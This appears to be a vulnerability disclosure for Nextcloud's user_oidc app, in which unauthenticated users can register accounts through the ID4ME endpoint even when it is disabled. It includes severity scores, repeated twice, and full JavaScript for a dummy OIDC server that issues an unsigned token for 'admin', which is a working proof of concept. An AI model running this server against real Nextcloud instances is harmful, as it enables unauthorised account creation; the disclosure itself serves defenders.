6.3 Medium
CVSS3
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
7.2 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
15.8%
It is possible to register a new account on any Nextcloud server that has user_oidc enabled by just opening /apps/user_oidc/id4me
as unauthenticated user. This is especially problematic given apps such as Nextcloud Talk enable accessing instance wide chat rooms.
This is caused since the setting to enable/disable ID4ME has no effect at all except hiding the button on the login site. The controllers are however still accessible.
id4me.cloud.wtf
which is a small test server that I’ve created running the below codeFor reference purposes, this is the server running the id4me.cloud.wtf
ID4Me dummy server:
export default {
async fetch(request, env, ctx) {
const { pathname } = new URL(request.url);
//return new Response("disabled");
if(pathname == "/.well-known/openid-configuration") {
return new Response('{"issuer":"https://id4me2.cloud.wtf","authorization_endpoint":"https://id4me2.cloud.wtf/auth","token_endpoint":"https://id4me2.cloud.wtf/token","token_introspection_endpoint":"https://id4me2.cloud.wtf/token/introspect","userinfo_endpoint":"https://id4me2.cloud.wtf/userinfo","end_session_endpoint":"https://id4me2.cloud.wtf/auth/realms/mbo/protocol/openid-connect/logout","jwks_uri":"https://id4me2.cloud.wtf/auth/realms/mbo/protocol/openid-connect/certs","check_session_iframe":"https://id4me2.cloud.wtf/auth/realms/mbo/protocol/openid-connect/login-status-iframe.html","grant_types_supported":["authorization_code","implicit","refresh_token","password","client_credentials"],"response_types_supported":["code","none","id_token","token","id_token token","code id_token","code token","code id_token token"],"subject_types_supported":["public","pairwise"],"id_token_signing_alg_values_supported":["ES384","RS384","HS256","HS512","ES256","RS256","HS384","ES512","RS512"],"userinfo_signing_alg_values_supported":["ES384","RS384","HS256","HS512","ES256","RS256","HS384","ES512","RS512","none"],"request_object_signing_alg_values_supported":["ES384","RS384","ES256","RS256","ES512","RS512","none"],"response_modes_supported":["query","fragment","form_post"],"registration_endpoint":"https://id4me2.cloud.wtf/register","token_endpoint_auth_methods_supported":["private_key_jwt","client_secret_basic","client_secret_post","client_secret_jwt"],"token_endpoint_auth_signing_alg_values_supported":["RS256"],"claims_supported":["sub","iss","auth_time","name","given_name","family_name","preferred_username","email"],"claim_types_supported":["normal"],"claims_parameter_supported":false,"scopes_supported":["openid","profile","roles","phone","offline_access","address","web-origins","email","jpberlin"],"request_parameter_supported":true,"request_uri_parameter_supported":true,"code_challenge_methods_supported":["plain","S256"],"tls_client_certificate_bound_access_tokens":true,"introspection_endpoint":"https://id4me2.cloud.wtf/introspect"}');
}
if(pathname == "/register") {
return new Response('{"client_name": "id4me2.cloud.wtf", "client_id": "id4me2.cloud.wtf", "client_secret": "1234", "client_secret_expires_at": 1921684352, "redirect_uris": ["id4m2.cloud.wtf"], "userinfo_signed_response_alg": ""}');
}
if(pathname == "/auth") {
const { searchParams } = new URL(request.url);
let redirect_uri = searchParams.get('redirect_uri');
let state = searchParams.get('state');
let code = searchParams.get('nonce');
return Response.redirect(redirect_uri + "?state=" + state + "&code=" + code, 307);
}
if(pathname == "/token") {
let header = btoa(JSON.stringify({ }));
let payload = btoa(JSON.stringify({ "aud": "id4me2.cloud.wtf", "sub": "admin", "exp": 1771290271 }));
let fullResponse = JSON.stringify({"id_token": header + "." + payload + ".signature"});
return new Response(fullResponse);
}
return new Response('Hello World!');
},
};
It is possible to register a new account on any Nextcloud server that has user_oidc enabled by just opening /apps/user_oidc/id4me
as unauthenticated user.
6.3 Medium
CVSS3
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
7.2 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
15.8%